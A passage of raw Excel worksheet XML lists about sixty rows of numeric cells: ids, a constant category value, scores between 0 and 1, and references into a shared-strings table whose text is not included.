        <v>6419</v>
      </c>
      <c r="D5152">
        <v>3</v>
      </c>
      <c r="E5152">
        <v>0.58579999208450317</v>
      </c>
      <c r="F5152" t="s">
        <v>10120</v>
      </c>
      <c r="G5152" t="s">
        <v>10185</v>
      </c>
      <c r="H5152" t="s">
        <v>10186</v>
      </c>
    </row>
    <row r="5153" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5153" s="1">
        <v>5151</v>
      </c>
      <c r="B5153">
        <v>5944</v>
      </c>
      <c r="C5153">
        <v>5944</v>
      </c>
      <c r="D5153">
        <v>3</v>
      </c>
      <c r="E5153">
        <v>0.94480001926422119</v>
      </c>
      <c r="F5153" t="s">
        <v>10120</v>
      </c>
      <c r="G5153" t="s">
        <v>10187</v>
      </c>
      <c r="H5153" t="s">
        <v>10188</v>
      </c>
    </row>
    <row r="5154" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5154" s="1">
        <v>5152</v>
      </c>
      <c r="B5154">
        <v>7832</v>
      </c>
      <c r="C5154">
        <v>7832</v>
      </c>
      <c r="D5154">
        <v>3</v>
      </c>
      <c r="E5154">
        <v>0.52569997310638428</v>
      </c>
      <c r="F5154" t="s">
        <v>10120</v>
      </c>
      <c r="G5154" t="s">
        <v>10189</v>
      </c>
      <c r="H5154" t="s">
        <v>10190</v>
      </c>
    </row>
    <row r="5155" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5155" s="1">
        <v>5153</v>
      </c>
      <c r="B5155">
        <v>7834</v>
      </c>
      <c r="C5155">
        <v>7834</v>
      </c>
      <c r="D5155">
        <v>3</v>
      </c>
      <c r="E5155">
        <v>0.60089999437332153</v>
      </c>
      <c r="F5155" t="s">
        <v>10120</v>
      </c>
      <c r="G5155" t="s">
        <v>10191</v>
      </c>
      <c r="H5155" t="s">
        <v>10192</v>
      </c>
    </row>
    <row r="5156" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5156" s="1">
        <v>5154</v>
      </c>
      <c r="B5156">
        <v>5686</v>
      </c>
      <c r="C5156">
        <v>5686</v>
      </c>
      <c r="D5156">
        <v>3</v>
      </c>
      <c r="E5156">
        <v>0.36809998750686651</v>
      </c>
      <c r="F5156" t="s">
        <v>10120</v>
      </c>
      <c r="G5156" t="s">
        <v>10193</v>
      </c>
      <c r="H5156" t="s">
        <v>10194</v>
      </c>
    </row>
    <row r="5157" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5157" s="1">
        <v>5155</v>
      </c>
      <c r="B5157">
        <v>5943</v>
      </c>
      <c r="C5157">
        <v>5943</v>
      </c>
      <c r="D5157">
        <v>3</v>
      </c>
      <c r="E5157">
        <v>0.77399998903274536</v>
      </c>
      <c r="F5157" t="s">
        <v>10120</v>
      </c>
      <c r="G5157" t="s">
        <v>10195</v>
      </c>
      <c r="H5157" t="s">
        <v>10196</v>
      </c>
    </row>
    <row r="5158" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5158" s="1">
        <v>5156</v>
      </c>
      <c r="B5158">
        <v>5998</v>
      </c>
      <c r="C5158">
        <v>5998</v>
      </c>
      <c r="D5158">
        <v>3</v>
      </c>
      <c r="E5158">
        <v>0.86100000143051147</v>
      </c>
      <c r="F5158" t="s">
        <v>10120</v>
      </c>
      <c r="G5158" t="s">
        <v>10197</v>
      </c>
      <c r="H5158" t="s">
        <v>10198</v>
      </c>
    </row>
    <row r="5159" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5159" s="1">
        <v>5157</v>
      </c>
      <c r="B5159">
        <v>5615</v>
      </c>
      <c r="C5159">
        <v>5615</v>
      </c>
      <c r="D5159">
        <v>3</v>
      </c>
      <c r="E5159">
        <v>0.97100001573562622</v>
      </c>
      <c r="F5159" t="s">
        <v>10120</v>
      </c>
      <c r="G5159" t="s">
        <v>10199</v>
      </c>
      <c r="H5159" t="s">
        <v>10200</v>
      </c>
    </row>
    <row r="5160" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5160" s="1">
        <v>5158</v>
      </c>
      <c r="B5160">
        <v>6420</v>
      </c>
      <c r="C5160">
        <v>6420</v>
      </c>
      <c r="D5160">
        <v>3</v>
      </c>
      <c r="E5160">
        <v>0.99580001831054688</v>
      </c>
      <c r="F5160" t="s">
        <v>10120</v>
      </c>
      <c r="G5160" t="s">
        <v>10201</v>
      </c>
      <c r="H5160" t="s">
        <v>10202</v>
      </c>
    </row>
    <row r="5161" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5161" s="1">
        <v>5159</v>
      </c>
      <c r="B5161">
        <v>7892</v>
      </c>
      <c r="C5161">
        <v>7892</v>
      </c>
      <c r="D5161">
        <v>3</v>
      </c>
      <c r="E5161">
        <v>0.79070001840591431</v>
      </c>
      <c r="F5161" t="s">
        <v>10120</v>
      </c>
      <c r="G5161" t="s">
        <v>10203</v>
      </c>
      <c r="H5161" t="s">
        <v>10204</v>
      </c>
    </row>
    <row r="5162" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5162" s="1">
        <v>5160</v>
      </c>
      <c r="B5162">
        <v>6057</v>
      </c>
      <c r="C5162">
        <v>6057</v>
      </c>
      <c r="D5162">
        <v>3</v>
      </c>
      <c r="E5162">
        <v>0.61900001764297485</v>
      </c>
      <c r="F5162" t="s">
        <v>10120</v>
      </c>
      <c r="G5162" t="s">
        <v>10205</v>
      </c>
      <c r="H5162" t="s">
        <v>10206</v>
      </c>
    </row>
    <row r="5163" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5163" s="1">
        <v>5161</v>
      </c>
      <c r="B5163">
        <v>6384</v>
      </c>
      <c r="C5163">
        <v>6384</v>
      </c>
      <c r="D5163">
        <v>3</v>
      </c>
      <c r="E5163">
        <v>0.8464999794960022</v>
      </c>
      <c r="F5163" t="s">
        <v>10120</v>
      </c>
      <c r="G5163" t="s">
        <v>10207</v>
      </c>
      <c r="H5163" t="s">
        <v>10208</v>
      </c>
    </row>
    <row r="5164" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5164" s="1">
        <v>5162</v>
      </c>
      <c r="B5164">
        <v>6510</v>
      </c>
      <c r="C5164">
        <v>6510</v>
      </c>
      <c r="D5164">
        <v>3</v>
      </c>
      <c r="E5164">
        <v>0.76090002059936523</v>
      </c>
      <c r="F5164" t="s">
        <v>10120</v>
      </c>
      <c r="G5164" t="s">
        <v>10209</v>
      </c>
      <c r="H5164" t="s">
        <v>10210</v>
      </c>
    </row>
    <row r="5165" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5165" s="1">
        <v>5163</v>
      </c>
      <c r="B5165">
        <v>7918</v>
      </c>
      <c r="C5165">
        <v>7918</v>
      </c>
      <c r="D5165">
        <v>3</v>
      </c>
      <c r="E5165">
        <v>0.73119997978210449</v>
      </c>
      <c r="F5165" t="s">
        <v>10120</v>
      </c>
      <c r="G5165" t="s">
        <v>10211</v>
      </c>
      <c r="H5165" t="s">
        <v>10212</v>
      </c>
    </row>
    <row r="5166" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5166" s="1">
        <v>5164</v>
      </c>
      <c r="B5166">
        <v>7114</v>
      </c>
      <c r="C5166">
        <v>7114</v>
      </c>
      <c r="D5166">
        <v>3</v>
      </c>
      <c r="E5166">
        <v>0.69370001554489136</v>
      </c>
      <c r="F5166" t="s">
        <v>10120</v>
      </c>
      <c r="G5166" t="s">
        <v>10213</v>
      </c>
      <c r="H5166" t="s">
        <v>10214</v>
      </c>
    </row>
    <row r="5167" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5167" s="1">
        <v>5165</v>
      </c>
      <c r="B5167">
        <v>5703</v>
      </c>
      <c r="C5167">
        <v>5703</v>
      </c>
      <c r="D5167">
        <v>3</v>
      </c>
      <c r="E5167">
        <v>0.99910002946853638</v>
      </c>
      <c r="F5167" t="s">
        <v>10120</v>
      </c>
      <c r="G5167" t="s">
        <v>10215</v>
      </c>
      <c r="H5167" t="s">
        <v>10216</v>
      </c>
    </row>
    <row r="5168" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5168" s="1">
        <v>5166</v>
      </c>
      <c r="B5168">
        <v>7118</v>
      </c>
      <c r="C5168">
        <v>7118</v>
      </c>
      <c r="D5168">
        <v>3</v>
      </c>
      <c r="E5168">
        <v>0.73409998416900635</v>
      </c>
      <c r="F5168" t="s">
        <v>10120</v>
      </c>
      <c r="G5168" t="s">
        <v>10217</v>
      </c>
      <c r="H5168" t="s">
        <v>10218</v>
      </c>
    </row>
    <row r="5169" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5169" s="1">
        <v>5167</v>
      </c>
      <c r="B5169">
        <v>5979</v>
      </c>
      <c r="C5169">
        <v>5979</v>
      </c>
      <c r="D5169">
        <v>3</v>
      </c>
      <c r="E5169">
        <v>0.57510000467300415</v>
      </c>
      <c r="F5169" t="s">
        <v>10120</v>
      </c>
      <c r="G5169" t="s">
        <v>10219</v>
      </c>
      <c r="H5169" t="s">
        <v>10220</v>
      </c>
    </row>
    <row r="5170" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5170" s="1">
        <v>5168</v>
      </c>
      <c r="B5170">
        <v>6373</v>
      </c>
      <c r="C5170">
        <v>6373</v>
      </c>
      <c r="D5170">
        <v>3</v>
      </c>
      <c r="E5170">
        <v>0.50730001926422119</v>
      </c>
      <c r="F5170" t="s">
        <v>10120</v>
      </c>
      <c r="G5170" t="s">
        <v>10221</v>
      </c>
      <c r="H5170" t="s">
        <v>10222</v>
      </c>
    </row>
    <row r="5171" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5171" s="1">
        <v>5169</v>
      </c>
      <c r="B5171">
        <v>5577</v>
      </c>
      <c r="C5171">
        <v>5577</v>
      </c>
      <c r="D5171">
        <v>3</v>
      </c>
      <c r="E5171">
        <v>0.83079999685287476</v>
      </c>
      <c r="F5171" t="s">
        <v>10120</v>
      </c>
      <c r="G5171" t="s">
        <v>10223</v>
      </c>
      <c r="H5171" t="s">
        <v>10224</v>
      </c>
    </row>
    <row r="5172" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5172" s="1">
        <v>5170</v>
      </c>
      <c r="B5172">
        <v>7049</v>
      </c>
      <c r="C5172">
        <v>7049</v>
      </c>
      <c r="D5172">
        <v>3</v>
      </c>
      <c r="E5172">
        <v>0.95719999074935913</v>
      </c>
      <c r="F5172" t="s">
        <v>10120</v>
      </c>
      <c r="G5172" t="s">
        <v>10225</v>
      </c>
      <c r="H5172" t="s">
        <v>10226</v>
      </c>
    </row>
    <row r="5173" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5173" s="1">
        <v>5171</v>
      </c>
      <c r="B5173">
        <v>7916</v>
      </c>
      <c r="C5173">
        <v>7916</v>
      </c>
      <c r="D5173">
        <v>3</v>
      </c>
      <c r="E5173">
        <v>0.87589997053146362</v>
      </c>
      <c r="F5173" t="s">
        <v>10120</v>
      </c>
      <c r="G5173" t="s">
        <v>10227</v>
      </c>
      <c r="H5173" t="s">
        <v>10228</v>
      </c>
    </row>
    <row r="5174" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5174" s="1">
        <v>5172</v>
      </c>
      <c r="B5174">
        <v>6964</v>
      </c>
      <c r="C5174">
        <v>6964</v>
      </c>
      <c r="D5174">
        <v>3</v>
      </c>
      <c r="E5174">
        <v>0.99940001964569092</v>
      </c>
      <c r="F5174" t="s">
        <v>10120</v>
      </c>
      <c r="G5174" t="s">
        <v>10229</v>
      </c>
      <c r="H5174" t="s">
        <v>10158</v>
      </c>
    </row>
    <row r="5175" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5175" s="1">
        <v>5173</v>
      </c>
      <c r="B5175">
        <v>6963</v>
      </c>
      <c r="C5175">
        <v>6963</v>
      </c>
      <c r="D5175">
        <v>3</v>
      </c>
      <c r="E5175">
        <v>0.99089998006820679</v>
      </c>
      <c r="F5175" t="s">
        <v>10120</v>
      </c>
      <c r="G5175" t="s">
        <v>10230</v>
      </c>
      <c r="H5175" t="s">
        <v>10231</v>
      </c>
    </row>
    <row r="5176" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5176" s="1">
        <v>5174</v>
      </c>
      <c r="B5176">
        <v>7924</v>
      </c>
      <c r="C5176">
        <v>7924</v>
      </c>
      <c r="D5176">
        <v>3</v>
      </c>
      <c r="E5176">
        <v>0.66640001535415649</v>
      </c>
      <c r="F5176" t="s">
        <v>10120</v>
      </c>
      <c r="G5176" t="s">
        <v>10232</v>
      </c>
      <c r="H5176" t="s">
        <v>10233</v>
      </c>
    </row>
    <row r="5177" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5177" s="1">
        <v>5175</v>
      </c>
      <c r="B5177">
        <v>5617</v>
      </c>
      <c r="C5177">
        <v>5617</v>
      </c>
      <c r="D5177">
        <v>3</v>
      </c>
      <c r="E5177">
        <v>0.99589997529983521</v>
      </c>
      <c r="F5177" t="s">
        <v>10120</v>
      </c>
      <c r="G5177" t="s">
        <v>10234</v>
      </c>
      <c r="H5177" t="s">
        <v>10235</v>
      </c>
    </row>
    <row r="5178" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5178" s="1">
        <v>5176</v>
      </c>
      <c r="B5178">
        <v>7926</v>
      </c>
      <c r="C5178">
        <v>7926</v>
      </c>
      <c r="D5178">
        <v>3</v>
      </c>
      <c r="E5178">
        <v>0.99819999933242798</v>
      </c>
      <c r="F5178" t="s">
        <v>10120</v>
      </c>
      <c r="G5178" t="s">
        <v>10236</v>
      </c>
      <c r="H5178" t="s">
        <v>10237</v>
      </c>
    </row>
    <row r="5179" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5179" s="1">
        <v>5177</v>
      </c>
      <c r="B5179">
        <v>6017</v>
      </c>
      <c r="C5179">
        <v>6017</v>
      </c>
      <c r="D5179">
        <v>3</v>
      </c>
      <c r="E5179">
        <v>0.45960000157356262</v>
      </c>
      <c r="F5179" t="s">
        <v>10120</v>
      </c>
      <c r="G5179" t="s">
        <v>10238</v>
      </c>
      <c r="H5179" t="s">
        <v>10239</v>
      </c>
    </row>
    <row r="5180" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5180" s="1">
        <v>5178</v>
      </c>
      <c r="B5180">
        <v>7927</v>
      </c>
      <c r="C5180">
        <v>7927</v>
      </c>
      <c r="D5180">
        <v>3</v>
      </c>
      <c r="E5180">
        <v>0.51940000057220459</v>
      </c>
      <c r="F5180" t="s">
        <v>10120</v>
      </c>
      <c r="G5180" t="s">
        <v>10240</v>
      </c>
      <c r="H5180" t="s">
        <v>10241</v>
      </c>
    </row>
    <row r="5181" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5181" s="1">
        <v>5179</v>
      </c>
      <c r="B5181">
        <v>6288</v>
      </c>
      <c r="C5181">
        <v>6288</v>
      </c>
      <c r="D5181">
        <v>3</v>
      </c>
      <c r="E5181">
        <v>0.74010002613067627</v>
      </c>
      <c r="F5181" t="s">
        <v>10120</v>
      </c>
      <c r="G5181" t="s">
        <v>10242</v>
      </c>
      <c r="H5181" t="s">
        <v>10243</v>
      </c>
    </row>
    <row r="5182" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5182" s="1">
        <v>5180</v>
      </c>
      <c r="B5182">
        <v>7698</v>
      </c>
      <c r="C5182">
        <v>7698</v>
      </c>
      <c r="D5182">
        <v>3</v>
      </c>
      <c r="E5182">
        <v>0.99819999933242798</v>
      </c>
      <c r="F5182" t="s">
        <v>10120</v>
      </c>
      <c r="G5182" t="s">
        <v>10244</v>
      </c>
      <c r="H5182" t="s">
        <v>10245</v>
      </c>
    </row>
    <row r="5183" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5183" s="1">
        <v>5181</v>
      </c>
      <c r="B5183">
        <v>7928</v>
      </c>
      <c r="C5183">
        <v>7928</v>
      </c>
      <c r="D5183">
        <v>3</v>
      </c>
      <c r="E5183">
        <v>0.81699997186660767</v>
      </c>
      <c r="F5183" t="s">
        <v>10120</v>
      </c>
      <c r="G5183" t="s">
        <v>10246</v>
      </c>
      <c r="H5183" t="s">
        <v>10247</v>
      </c>
    </row>
    <row r="5184" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5184" s="1">
        <v>5182</v>
      </c>
      <c r="B5184">
        <v>6962</v>
      </c>
      <c r="C5184">
        <v>6962</v>
      </c>
      <c r="D5184">
        <v>3</v>
      </c>
      <c r="E5184">
        <v>0.47920000553131098</v>
      </c>
      <c r="F5184" t="s">
        <v>10120</v>
      </c>
      <c r="G5184" t="s">
        <v>10248</v>
      </c>
      <c r="H5184" t="s">
        <v>10249</v>
      </c>
    </row>
    <row r="5185" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5185" s="1">
        <v>5183</v>
      </c>
      <c r="B5185">
        <v>6998</v>
      </c>
      <c r="C5185">
        <v>6998</v>
      </c>
      <c r="D5185">
        <v>3</v>
      </c>
      <c r="E5185">
        <v>0.98869997262954712</v>
      </c>
      <c r="F5185" t="s">
        <v>10120</v>
      </c>
      <c r="G5185" t="s">
        <v>10250</v>
      </c>
      <c r="H5185" t="s">
        <v>10251</v>
      </c>
    </row>
    <row r="5186" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5186" s="1">
        <v>5184</v>
      </c>
      <c r="B5186">
        <v>7713</v>
      </c>
      <c r="C5186">
        <v>7713</v>
      </c>
      <c r="D5186">
        <v>3</v>
      </c>
      <c r="E5186">
        <v>0.47069999575614929</v>
      </c>
      <c r="F5186" t="s">
        <v>10120</v>
      </c>
      <c r="G5186" t="s">
        <v>10252</v>
      </c>
      <c r="H5186" t="s">
        <v>10253</v>
      </c>
    </row>
    <row r="5187" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5187" s="1">
        <v>5185</v>
      </c>
      <c r="B5187">
        <v>6961</v>
      </c>
      <c r="C5187">
        <v>6961</v>
      </c>
      <c r="D5187">
        <v>3</v>
      </c>
      <c r="E5187">
        <v>0.74699997901916504</v>
      </c>
      <c r="F5187" t="s">
        <v>10120</v>
      </c>
      <c r="G5187" t="s">
        <v>10254</v>
      </c>
      <c r="H5187" t="s">
        <v>10255</v>
      </c>
    </row>
    <row r="5188" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5188" s="1">
        <v>5186</v>
      </c>
      <c r="B5188">
        <v>6504</v>
      </c>
      <c r="C5188">
        <v>6504</v>
      </c>
      <c r="D5188">
        <v>3</v>
      </c>
      <c r="E5188">
        <v>0.8288000226020813</v>
      </c>
      <c r="F5188" t="s">
        <v>10120</v>
      </c>
      <c r="G5188" t="s">
        <v>10256</v>
      </c>
      <c r="H5188" t="s">
        <v>10257</v>
      </c>
    </row>
    <row r="5189" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5189" s="1">
        <v>5187</v>
      </c>
      <c r="B5189">
        <v>6997</v>
      </c>
      <c r="C5189">
        <v>6997</v>
      </c>
      <c r="D5189">
        <v>3</v>
      </c>
      <c r="E5189">
        <v>0.98860001564025879</v>
      </c>
      <c r="F5189" t="s">
        <v>10120</v>
      </c>
      <c r="G5189" t="s">
        <v>10258</v>
      </c>
      <c r="H5189" t="s">
        <v>10259</v>
      </c>
    </row>
    <row r="5190" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5190" s="1">
        <v>5188</v>
      </c>
      <c r="B5190">
        <v>7100</v>
      </c>
      <c r="C5190">
        <v>7100</v>
      </c>
      <c r="D5190">
        <v>3</v>
      </c>
      <c r="E5190">
        <v>0.69800001382827759</v>
      </c>
      <c r="F5190" t="s">
        <v>10120</v>
      </c>
      <c r="G5190" t="s">
        <v>10260</v>
      </c>
      <c r="H5190" t="s">
        <v>10261</v>
      </c>
    </row>
    <row r="5191" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5191" s="1">
        <v>5189</v>
      </c>
      <c r="B5191">
        <v>7721</v>
      </c>
      <c r="C5191">
        <v>7721</v>
      </c>
      <c r="D5191">
        <v>3</v>
      </c>
      <c r="E5191">
        <v>0.99889999628067017</v>
      </c>
      <c r="F5191" t="s">
        <v>10120</v>
      </c>
      <c r="G5191" t="s">
        <v>10262</v>
      </c>
      <c r="H5191" t="s">
        <v>10263</v>
      </c>
    </row>
    <row r="5192" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5192" s="1">
        <v>5190</v>
      </c>
      <c r="B5192">
        <v>6339</v>
      </c>
      <c r="C5192">
        <v>6339</v>
      </c>
      <c r="D5192">
        <v>3</v>
      </c>
      <c r="E5192">
        <v>0.74210000038146973</v>
      </c>
      <c r="F5192" t="s">
        <v>10120</v>
      </c>
      <c r="G5192" t="s">
        <v>10264</v>
      </c>
      <c r="H5192" t="s">
        <v>10265</v>
      </c>
    </row>
    <row r="5193" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5193" s="1">
        <v>5191</v>
      </c>
      <c r="B5193">
        <v>7720</v>
      </c>
      <c r="C5193">
        <v>7720</v>
      </c>
      <c r="D5193">
        <v>3</v>
      </c>
      <c r="E5193">
        <v>0.62889999151229858</v>
      </c>
      <c r="F5193" t="s">
        <v>10120</v>
      </c>
      <c r="G5193" t="s">
        <v>10266</v>
      </c>
      <c r="H5193" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="5194" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5194" s="1">
        <v>5192</v>
      </c>
      <c r="B5194">
        <v>6429</v>
      </c>
      <c r="C5194">
        <v>6429</v>
      </c>
      <c r="D5194">
        <v>3</v>
      </c>
      <c r="E5194">
        <v>0.87639999389648438</v>
      </c>
      <c r="F5194" t="s">
        <v>10120</v>
      </c>
      <c r="G5194" t="s">
        <v>10268</v>
      </c>
      <c r="H5194" t="s">
        <v>10269</v>
      </c>
    </row>
    <row r="5195" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5195" s="1">
        <v>5193</v>
      </c>
      <c r="B5195">
        <v>5691</v>
      </c>
      <c r="C5195">
        <v>5691</v>
      </c>
      <c r="D5195">
        <v>3</v>
      </c>
      <c r="E5195">
        <v>0.99449998140335083</v>
      </c>
      <c r="F5195" t="s">
        <v>10120</v>
      </c>
      <c r="G5195" t="s">
        <v>10270</v>
      </c>
      <c r="H5195" t="s">
        <v>10271</v>
      </c>
    </row>
    <row r="5196" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5196" s="1">
        <v>5194</v>
      </c>
      <c r="B5196">
        <v>7719</v>
      </c>
      <c r="C5196">
        <v>7719</v>
      </c>
      <c r="D5196">
        <v>3</v>
      </c>
      <c r="E5196">
        <v>0.99889999628067017</v>
      </c>
      <c r="F5196" t="s">
        <v>10120</v>
      </c>
      <c r="G5196" t="s">
        <v>10272</v>
      </c>
      <c r="H5196" t="s">
        <v>10263</v>
      </c>
    </row>
    <row r="5197" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5197" s="1">
        <v>5195</v>
      </c>
      <c r="B5197">
        <v>5699</v>
      </c>
      <c r="C5197">
        <v>5699</v>
      </c>
      <c r="D5197">
        <v>3</v>
      </c>
      <c r="E5197">
        <v>0.63090002536773682</v>
      </c>
      <c r="F5197" t="s">
        <v>10120</v>
      </c>
      <c r="G5197" t="s">
        <v>10273</v>
      </c>
      <c r="H5197" t="s">
        <v>10274</v>
      </c>
    </row>
    <row r="5198" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5198" s="1">
        <v>5196</v>
      </c>
      <c r="B5198">
        <v>5582</v>
      </c>
      <c r="C5198">
        <v>5582</v>
      </c>
      <c r="D5198">
        <v>3</v>
      </c>
      <c r="E5198">
        <v>0.89429998397827148</v>
      </c>
      <c r="F5198" t="s">
        <v>10120</v>
      </c>
      <c r="G5198" t="s">
        <v>10275</v>
      </c>
      <c r="H5198" t="s">
        <v>10276</v>
      </c>
    </row>
    <row r="5199" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5199" s="1">
        <v>5197</v>
      </c>
      <c r="B5199">
        <v>5693</v>
      </c>
      <c r="C5199">
        <v>5693</v>
      </c>
      <c r="D5199">
        <v>3</v>
      </c>
      <c r="E5199">
        <v>0.56459999084472656</v>
      </c>
      <c r="F5199" t="s">
        <v>10120</v>
      </c>
      <c r="G5199" t="s">
        <v>10277</v>
      </c>
      <c r="H5199" t="s">
        <v>10278</v>
      </c>
    </row>
    <row r="5200" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5200" s="1">
        <v>5198</v>
      </c>
      <c r="B5200">
        <v>5694</v>
      </c>
      <c r="C5200">
        <v>5694</v>
      </c>
      <c r="D5200">
        <v>3</v>
      </c>
      <c r="E5200">
        <v>0.875</v>
      </c>
      <c r="F5200" t="s">
        <v>10120</v>
      </c>
      <c r="G5200" t="s">
        <v>10279</v>
      </c>
      <c r="H5200" t="s">
        <v>10280</v>
      </c>
    </row>
    <row r="5201" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5201" s="1">
        <v>5199</v>
      </c>
      <c r="B5201">
        <v>7902</v>
      </c>
      <c r="C5201">
        <v>7902</v>
      </c>
      <c r="D5201">
        <v>3</v>
      </c>
      <c r="E5201">
        <v>0.99819999933242798</v>
      </c>
      <c r="F5201" t="s">
        <v>10120</v>
      </c>
      <c r="G5201" t="s">
        <v>10281</v>
      </c>
      <c r="H5201" t="s">
        <v>10282</v>
      </c>
    </row>
    <row r="5202" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5202" s="1">
        <v>5200</v>
      </c>
      <c r="B5202">
        <v>6507</v>
      </c>
      <c r="C5202">
        <v>6507</v>
      </c>
      <c r="D5202">
        <v>3</v>
      </c>
      <c r="E5202">
        <v>0.99119997024536133</v>
      </c>
      <c r="F5202" t="s">
        <v>10120</v>
      </c>
      <c r="G5202" t="s">
        <v>10283</v>
      </c>
      <c r="H5202" t="s">
        <v>10284</v>
      </c>
    </row>
    <row r="5203" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5203" s="1">
        <v>5201</v>
      </c>
      <c r="B5203">
        <v>7911</v>
      </c>
      <c r="C5203">
        <v>7911</v>
      </c>
      <c r="D5203">
        <v>3</v>
      </c>
      <c r="E5203">
        <v>0.99750000238418579</v>
      </c>
      <c r="F5203" t="s">
        <v>10120</v>
      </c>
      <c r="G5203" t="s">
        <v>10285</v>
      </c>
      <c r="H5203" t="s">
        <v>10286</v>
      </c>
    </row>
    <row r="5204" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5204" s="1">
        <v>5202</v>
      </c>
      <c r="B5204">
        <v>7912</v>
      </c>
      <c r="C5204">
        <v>7912</v>
      </c>
      <c r="D5204">
        <v>3</v>
      </c>
      <c r="E5204">
        <v>0.97020000219345093</v>
      </c>
      <c r="F5204" t="s">
        <v>10120</v>
      </c>
      <c r="G5204" t="s">
        <v>10287</v>
      </c>
      <c r="H5204" t="s">
        <v>10288</v>
      </c>
    </row>
    <row r="5205" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5205" s="1">
        <v>5203</v>
      </c>
      <c r="B5205">
        <v>7913</v>
      </c>
      <c r="C5205">
        <v>7913</v>
      </c>
      <c r="D5205">
        <v>3</v>
      </c>
      <c r="E5205">
        <v>0.79579997062683105</v>
      </c>
      <c r="F5205" t="s">
        <v>10120</v>
      </c>
      <c r="G5205" t="s">
        <v>10289</v>
      </c>
      <c r="H5205" t="s">
        <v>10290</v>
      </c>
    </row>
    <row r="5206" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5206" s="1">
        <v>5204</v>
      </c>
      <c r="B5206">
        <v>7113</v>
      </c>
      <c r="C5206">
        <v>7113</v>
      </c>
      <c r="D5206">
        <v>3</v>
      </c>
      <c r="E5206">
        <v>0.95039999485015869</v>
      </c>
      <c r="F5206" t="s">
        <v>10120</v>
      </c>
      <c r="G5206" t="s">
        <v>10291</v>
      </c>
      <c r="H5206" t="s">
        <v>10292</v>
      </c>
    </row>
    <row r="5207" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5207" s="1">
        <v>5205</v>
      </c>
      <c r="B5207">
        <v>7914</v>
      </c>
      <c r="C5207">
        <v>7914</v>
      </c>
      <c r="D5207">
        <v>3</v>
      </c>
      <c r="E5207">
        <v>0.9934999942779541</v>
      </c>
      <c r="F5207" t="s">
        <v>10120</v>
      </c>
      <c r="G5207" t="s">
        <v>10293</v>
      </c>
      <c r="H5207" t="s">
        <v>10294</v>
      </c>
    </row>
    <row r="5208" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5208" s="1">
        <v>5206</v>
      </c>
      <c r="B5208">
        <v>7901</v>
      </c>
      <c r="C5208">
        <v>7901</v>
      </c>
      <c r="D5208">
        <v>3</v>
      </c>
      <c r="E5208">
        <v>0.79360002279281616</v>
      </c>
      <c r="F5208" t="s">
        <v>10120</v>
      </c>
      <c r="G5208" t="s">
        <v>10295</v>
      </c>
      <c r="H5208" t="s">
        <v>10296</v>
      </c>
    </row>
    <row r="5209" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5209" s="1">
        <v>5207</v>
      </c>
      <c r="B5209">
        <v>5678</v>
      </c>
      <c r="C5209">
        <v>5678</v>
      </c>
      <c r="D5209">
        <v>3</v>
      </c>
      <c r="E5209">
        <v>0.64509999752044678</v>
      </c>
      <c r="F5209" t="s">
        <v>10120</v>
      </c>
      <c r="G5209" t="s">
        <v>10297</v>
      </c>
      <c r="H5209" t="s">
        <v>10298</v>
      </c>
    </row>
    <row r="5210" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5210" s="1">
        <v>5208</v>
      </c>
      <c r="B5210">
        <v>7849</v>
      </c>
      <c r="C5210">
        <v>7849</v>
      </c>
      <c r="D5210">
        <v>3</v>
      </c>
      <c r="E5210">
        <v>0.97380000352859497</v>
      </c>
      <c r="F5210" t="s">
        <v>10120</v>
      </c>
